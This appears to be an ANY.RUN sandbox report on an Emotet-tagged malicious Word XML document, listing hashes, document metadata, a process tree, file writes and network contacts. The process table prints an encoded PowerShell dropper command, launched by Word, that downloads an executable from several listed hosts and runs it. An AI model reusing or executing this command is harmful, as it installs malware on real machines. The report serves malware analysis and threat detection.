File name: | 847e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa |
Full analysis: | https://app.any.run/tasks/78437338-4b6f-4c65-8159-c9fcfba8fc9a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | February 18, 2019, 13:07:01 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators |
MD5: | D04999E6770DBD70D697171774D9FCA2 |
SHA1: | BD20AB57085B3216A9B1971C1587B3994EEC539C |
SHA256: | 847E718FA1DCA436C5F8E20E88BBC016BB163B7EAEEDD68824FF85FAB88F2EFA |
SSDEEP: | 3072:2gM6pmKZlGHuE6cJW5ZCQY6f8wFMP62h8hqjL/xSu90OoiLuDKZXfwKeljR1l:k6IKbx24ZC7MFSEh4xUOmD+XfwLB |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1) |
---|---|---|
.xml | | | Microsoft Office XML Flat File Format (ASCII) (31) |
.xml | | | Generic XML (ASCII) (2.3) |
.html | | | HyperText Markup Language (1.4) |
WordDocumentBodySectSectPrDocGridLine-pitch: | 360 |
---|---|
WordDocumentBodySectSectPrColsSpace: | 720 |
WordDocumentBodySectSectPrPgMarGutter: | - |
WordDocumentBodySectSectPrPgMarFooter: | 720 |
WordDocumentBodySectSectPrPgMarHeader: | 720 |
WordDocumentBodySectSectPrPgMarLeft: | 1440 |
WordDocumentBodySectSectPrPgMarBottom: | 1440 |
WordDocumentBodySectSectPrPgMarRight: | 1440 |
WordDocumentBodySectSectPrPgMarTop: | 1440 |
WordDocumentBodySectSectPrPgSzH: | 15840 |
WordDocumentBodySectSectPrPgSzW: | 12240 |
WordDocumentBodySectSectPrRsidR: | 005E6EE1 |
WordDocumentBodySectPRT: | |
WordDocumentBodySectPRPictShapeImagedataTitle: | - |
WordDocumentBodySectPRPictShapeImagedataSrc: | wordml://tuzWAo6FkAUf6 |
WordDocumentBodySectPRPictShapeStyle: | width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square |
WordDocumentBodySectPRPictShapeType: | #_x0000_t75 |
WordDocumentBodySectPRPictShapeSpid: | _x0000_i1025 |
WordDocumentBodySectPRPictShapeId: | Picture 1 |
WordDocumentBodySectPRPictBinData: | (Binary data 145376 bytes, use -b option to extract) |
WordDocumentBodySectPRPictBinDataName: | wordml://tuzWAo6FkAUf6 |
WordDocumentBodySectPRPictShapetypeLockAspectratio: | t |
WordDocumentBodySectPRPictShapetypeLockExt: | edit |
WordDocumentBodySectPRPictShapetypePathConnecttype: | rect |
WordDocumentBodySectPRPictShapetypePathGradientshapeok: | t |
WordDocumentBodySectPRPictShapetypePathExtrusionok: | f |
WordDocumentBodySectPRPictShapetypeFormulasFEqn: | if lineDrawn pixelLineWidth 0 |
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: | miter |
WordDocumentBodySectPRPictShapetypeStroked: | f |
WordDocumentBodySectPRPictShapetypeFilled: | f |
WordDocumentBodySectPRPictShapetypePath: | m@4@5l@4@11@9@11@9@5xe |
WordDocumentBodySectPRPictShapetypePreferrelative: | t |
WordDocumentBodySectPRPictShapetypeSpt: | 75 |
WordDocumentBodySectPRPictShapetypeCoordsize: | 21600,21600 |
WordDocumentBodySectPRPictShapetypeId: | _x0000_t75 |
WordDocumentBodySectPRRPrNoProof: | - |
WordDocumentBodySectPRRsidRPr: | 004F5309 |
WordDocumentBodySectPRsidRDefault: | 00853DEC |
WordDocumentBodySectPRsidR: | 00853DEC |
WordDocumentDocPrRsidsRsidVal: | 005A24B1 |
WordDocumentDocPrRsidsRsidRootVal: | 005E6EE1 |
WordDocumentDocPrCompatDontGrowAutofit: | - |
WordDocumentDocPrCompatUseAsianBreakRules: | - |
WordDocumentDocPrCompatWrapTextWithPunct: | - |
WordDocumentDocPrCompatSnapToGridInCell: | - |
WordDocumentDocPrCompatBreakWrappedTables: | - |
WordDocumentDocPrAlwaysShowPlaceholderTextVal: | off |
WordDocumentDocPrIgnoreMixedContentVal: | off |
WordDocumentDocPrSaveInvalidXMLVal: | off |
WordDocumentDocPrValidateAgainstSchema: | - |
WordDocumentDocPrPixelsPerInchVal: | 120 |
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: | - |
WordDocumentDocPrOptimizeForBrowser: | - |
WordDocumentDocPrCharacterSpacingControlVal: | DontCompress |
WordDocumentDocPrPunctuationKerning: | - |
WordDocumentDocPrDefaultTabStopVal: | 720 |
WordDocumentDocPrDoNotEmbedSystemFonts: | - |
WordDocumentDocPrRemovePersonalInformation: | - |
WordDocumentDocPrZoomPercent: | 100 |
WordDocumentDocPrViewVal: | |
WordDocumentShapeDefaultsShapelayoutIdmapData: | 1 |
WordDocumentShapeDefaultsShapelayoutIdmapExt: | edit |
WordDocumentShapeDefaultsShapelayoutExt: | edit |
WordDocumentShapeDefaultsShapedefaultsSpidmax: | 1026 |
WordDocumentShapeDefaultsShapedefaultsExt: | edit |
WordDocumentDocSuppDataBinData: | (Binary data 107904 bytes, use -b option to extract) |
WordDocumentDocSuppDataBinDataName: | KPRjpMJ |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 4 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 4 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:02:08 09:27:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:02:08 09:27:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\847e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 0 Version: 14.0.4750.1000 | ||||
2608 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\847e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3936 | Powershell -e JABJAGYAegBEAHcATQBmAD0AKAAnAFIAJwArACcASgBuAFUAUwBsACcAKQA7ACQAWQBCAG8AYgBmAEUAaQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABJAEQAaABvAEoAZABSAHQAPQAoACcAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwB0ACcAKwAnAHYAYgBpACcAKwAnAGwAZABpACcAKwAnAHIAaQBtAC4AYwBvAG0AJwArACcALwBLAHoAOAA1AE4ASAA2ADUAQABoAHQAdABwACcAKwAnADoALwAvAGUAJwArACcAbAByAGEAYwBvACcAKwAnAHMAZQBjAHIAJwArACcAZQAnACsAJwB0AC4AYwAnACsAJwBvAG0ALwAnACsAJwBkAEIASwBPAFYANgB4ACcAKwAnAG0AQABoACcAKwAnAHQAdABwADoALwAvAHMAZQBnACcAKwAnAHUAJwArACcAcgBpACcAKwAnAGUAJwArACcAeAAnACsAJwBwACcAKwAnAG8AJwArACcAZgBvAHIAbwAuAG8AcgBnACcAKwAnAC8ASAAnACsAJwBYAEoAaAByADgANQBQACcAKwAnAE8AJwArACcAQAAnACsAJwBoAHQAJwArACcAdABwADoAJwArACcALwAvACcAKwAnAHQAaAAnACsAJwBvAGkAdAByAGEAbgBnACcAKwAnAHMAdABhAHUAcAAuACcAKwAnAGMAbwBtAC8AawBDAFgAYgBxAHQASgBYAEcAQABoAHQAdABwACcAKwAnAHMAOgAvAC8AJwArACcAdwB3AHcALgBvAGkAbAByAGUAZgBpAG4AZQByAHkAbABpAG4AZQAnACsAJwAuACcAKwAnAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1ACcAKwAnAGQAZQBzAC8AdAA3AGQAJwArACcAdwBpACcAKwAnADYAaQBpAE8ASAAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABPAGQASABGAEQAawB0AD0AKAAnAHoAegAnACsAJwBtAG4AbgB2ADEAJwApADsAJABwAEUAZABJAHUAVgByAGoAIAA9ACAAJwA4ADgAJwA7ACQAdQBtADgAMgBCADkAWABXAD0AKAAnAG0ATAAnACsAJwBoAHEAMgBhACcAKQA7ACQAbABxAHcARABoAEUAYQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcABFAGQASQB1AFYAcgBqACsAKAAnAC4AJwArACcAZQB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWQA2AFgAOQBVAFIAMgB0ACAAaQBuACAAJABJAEQAaABvAEoAZABSAHQAKQB7AHQAcgB5AHsAJABZAEIAbwBiAGYARQBpAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFkANgBYADkAVQBSADIAdAAsACAAJABsAHEAdwBEAGgARQBhACkAOwAkAGQARwA1AEYAbwBLAE0AcgA9ACgAJwBrAFgAdwAnACsAJwBQAFAAcQBLACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGwAcQB3AEQAaABFAGEAKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABsAHEAdwBEAGgARQBhADsAJABqAEYARwBwAE8ANAA9ACgAJwBxAFAAJwArACcANgB2AE0AJwArACcAdAA3AGYAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHAAOAB6AG8AVABpADkAcAA9ACgAJwBaADYAMQBqACcAKwAnADAASAAnACsAJwBaACcAKQA7AA== | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6B1E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB9C032A.tmp | — | |
MD5:— | SHA256:— | |||
3936 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DRCW0PQTSGGT2QDJ0ZDL.temp | — | |
MD5:— | SHA256:— | |||
3936 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF24758e.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3936 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
2608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$7e718fa1dca436c5f8e20e88bbc016bb163b7eaeedd68824ff85fab88f2efa.xml | pgc | |
MD5:FF8892CFB2AACA347BF424713DCA72B3 | SHA256:D233113F9800CC81A562E02E2F7E71A04AB536EC77FCEE1A5E6926698B7318CB | |||
2608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:1F3834663FBABC6E0DDE076EC9795AB2 | SHA256:E9AC831CBF711513DA3313B5541D7805CB5EA96B88D19D6C3F5BB2A31FE49035 | |||
2608 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:C6A56A9D54BDC2AEDB4ED18E3587ADA2 | SHA256:9DB6C2919BC60A8D104A3ED9594A03768496DF6E7042B2EFDFF48CAEBE08AD19 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3936 | Powershell.exe | GET | 404 | 37.148.211.11:80 | http://tvbildirim.com/Kz85NH65 | TR | html | 15.3 Kb | suspicious |
3936 | Powershell.exe | GET | 301 | 209.240.96.46:80 | http://elracosecret.com/dBKOV6xm | US | — | — | suspicious |
3936 | Powershell.exe | GET | 404 | 103.232.121.71:80 | http://thoitrangstaup.com/kCXbqtJXG | VN | html | 61.1 Kb | unknown |
3936 | Powershell.exe | GET | 301 | 69.10.135.25:80 | http://seguriexpoforo.org/HXJhr85PO | CA | html | 379 b | suspicious |
3936 | Powershell.exe | GET | 200 | 69.10.135.25:80 | http://seguriexpoforo.org/HXJhr85PO/ | CA | html | 379 b | suspicious |
3936 | Powershell.exe | GET | 404 | 209.240.96.46:80 | http://www.elracosecret.com/dBKOV6xm | US | html | 14.4 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3936 | Powershell.exe | 69.10.135.25:80 | seguriexpoforo.org | TeraGo Networks Inc. | CA | suspicious |
3936 | Powershell.exe | 37.148.211.11:80 | tvbildirim.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | suspicious |
3936 | Powershell.exe | 209.240.96.46:80 | elracosecret.com | Turnkey Internet Inc. | US | malicious |
3936 | Powershell.exe | 47.88.29.116:443 | www.oilrefineryline.com | Alibaba (China) Technology Co., Ltd. | JP | unknown |
3936 | Powershell.exe | 103.232.121.71:80 | thoitrangstaup.com | Viet Solutions Services Trading Company Limited | VN | unknown |
Domain | IP | Reputation |
---|---|---|
tvbildirim.com |
| suspicious |
elracosecret.com |
| suspicious |
www.elracosecret.com |
| unknown |
seguriexpoforo.org |
| suspicious |
thoitrangstaup.com |
| unknown |
www.oilrefineryline.com |
| unknown |